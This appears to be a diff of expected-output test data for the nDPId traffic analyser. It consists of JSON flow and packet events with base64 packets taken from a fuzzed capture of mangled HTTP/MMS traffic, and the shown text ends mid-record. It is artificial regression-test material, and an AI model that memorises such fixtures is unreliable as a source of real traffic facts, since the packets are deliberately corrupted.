-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKlAAEAGJXMAFAMNrBQDBQBQCinJpw1V5Eu18lAQgyxSuQAA"} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488666,"flow_last_seen":1031854488666,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854488666,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1031854488666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854488666,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxKdAAEAGF+qsFAMNrBQDBQBQCinJpw1U5EuqimASgyxGZAAAAgQFtA=="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1031854488666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854488666,"pkt":"CAAgsl17AFCLk5N8CABFAAAo9UpAAIAGp0qsFAMFrBQDDQopAFDkS6qKyacNVVAQIji\/FQAAAgQFtGDD"} +02416{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1031854488667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854488667,"pkt":"CAAgsl17AFCLk5N8CABFAAXc9kpAAIAGoJasFAMFrBQDDQopAFDkS6qKyacNVVAQIjheTQAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N8OiAxNzIuMjAuMy4xMw0KT3B0OiDQaHR0cDovL3d3dy53My5vcmdtMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLUFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCkFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTowPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3Lnd2Lm9yZy8xOTk5LzAyL6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq
qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854488666,"flow_last_seen":1031854488667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1031854488667,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKhAAEAGF+2sFAMNrBQDBQBRCinJpw1V5EuwPlAQgyxYbQAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854488668,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1031854488668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854488668,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxKlAAEAGJXMAFAMNrBQDBQBQCinJpw1V5Eu18lAQgyxSuQAA"} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":15,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":21760,"global_ts_msec":1031854488923} 00611{"packet_event_id":1,"packet_event_name":"packet","packet_id":15,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":243,"pkt_type":21760,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":243,"pkt_l4_len":0,"thread_ts_msec":1031854488771,"pkt":"AFCLk5N8CAAgsl17VQBFAADlxKtAAEAGFy2sFAMNrBQDBQBQCinLpw1V5EvBTVAYgyzwBgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXL+IFJlc2luLzIuMMsxDQpDb2509m50LVR5cGU6IGFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNvbnRlbnQtTGVuZ3RoOiA0NQ0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo0OCBHTVQNCg0KjIGYMS05YmEwAI2QkoCLMTg5MzAwQGdl\/WTHMi5tb2JpbGl0eWxhYi5uZXQA"} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489004,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854489004,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1031854489005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854489005,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxK1AAEAGF+isFAMNrBQDBc+MAFDJtOyP\/k2aD1AQgyzJ7gAA"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}} -00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1031854489007,"pkt":"CAAgsl17AFCLk5N8CABFAACB\/UpAAIAGnvGsFAMBrBQDDQBQz4zkTZoPybTxE1AYHbQX8gAASFRUUC8xLjEgMTAwIENvbnRpbnVlDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpQYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE3OjU4OjU2IEdNVA0KDQo="} -00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854489031,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1031854489031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1031854489031,"pkt":"CAAgsl17AFCLk5N8CABFAAC1\/kpAAIAGnb2sFAMFrDkDDQBQz4zkTZpoybTxE1AYHbQrwQAASFRUby8xLjEgMjAyIEFjY2VwdGVkDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDUyIDE3OjU4OjU2IEdNVA0KQ29udGVudC1MZW5ndGg6IDQyNw0KJXMAdGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCg0K"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854489131,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01039{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":481,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":481,"pkt_l4_len":447,"thread_ts_msec":1031854489131,"pkt":"CAAgsl17AFCLk5N8CABFAAHT\/0pAAIAGm5+sBgMFrBQDDQBQz4zkTZr1ybTxE1AYHbTqTgAAPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+CjxwYXA+CiAgPHB1c2gtcmVzcG9uc2UgcnVzaC1pZD0iMTg5MzAxXzEwMzE4NTQ0ODg5OTdfMTAzOEBnZWNkczIubW9iaWxpdHlsYWIubmV0IiBzZW5kZXKtYWRkcmVzcz0iaHR0cDovL2xtY21vbGYud2FwbWF0aWMuZGUiIHNlbmRlcuRuYW1lPSJ3Z3A0IiByZXBseS2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAAAsB0tAAIAGlUasFAMFrBUDDQoqAFDkZMdqAADsAGACIABjogAAAgQFtFQI"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489004,"flow_last_seen":1031854489004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854489004,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1031854489004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854489004,"pkt":"AFCLk5N8CAAgsl17CABFAAAwxKxAAEAGF+GsFAMNrBQDBc+MAFDJtOyOAAAAAHACgywbmAAAAQEEiQIEBbQ="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1031854489005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854489005,"pkt":"CAAgsl17AFCLk5N8CABFAAAs+0pAAIAGoUasFAMFrBQDDQBQz4zkTZoOyWDsj2ASIjgTJgAAAgQFtG4v"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1031854489005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854489005,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxK1AAEAGF+isFAMNrBQDBc+MAFDJtOyP\/k2aD1AQgyzJ7gAA"} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854489004,"flow_last_seen":1031854489006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1031854489006,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"%s","url":"%s","code":0,"content_type":"","user_agent":"MMS-Relay-DeliveryInitiator"}} 
+00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854489007,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1031854489007,"pkt":"CAAgsl17AFCLk5N8CABFAACB\/UpAAIAGnvGsFAMBrBQDDQBQz4zkTZoPybTxE1AYHbQX8gAASFRUUC8xLjEgMTAwIENvbnRpbnVlDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpQYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE3OjU4OjU2IEdNVA0KDQo="} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854489031,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1031854489031,"pkt":"CAAgsl17AFCLk5N8CABFAAC1\/kpAAIAGnb2sFAMFrDkDDQBQz4zkTZpoybTxE1AYHbQrwQAASFRUby8xLjEgMjAyIEFjY2VwdGVkDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDUyIDE3OjU4OjU2IEdNVA0KQ29udGVudC1MZW5ndGg6IDQyNw0KJXMAdGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCg0K"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854489131,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01039{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":481,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":481,"pkt_l4_len":447,"thread_ts_msec":1031854489131,"pkt":"CAAgsl17AFCLk5N8CABFAAHT\/0pAAIAGm5+sBgMFrBQDDQBQz4zkTZr1ybTxE1AYHbTqTgAAPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+CjxwYXA+CiAgPHB1c2gtcmVzcG9uc2UgcnVzaC1pZD0iMTg5MzAxXzEwMzE4NTQ0ODg5OTdfMTAzOEBnZWNkczIubW9iaWxpdHlsYWI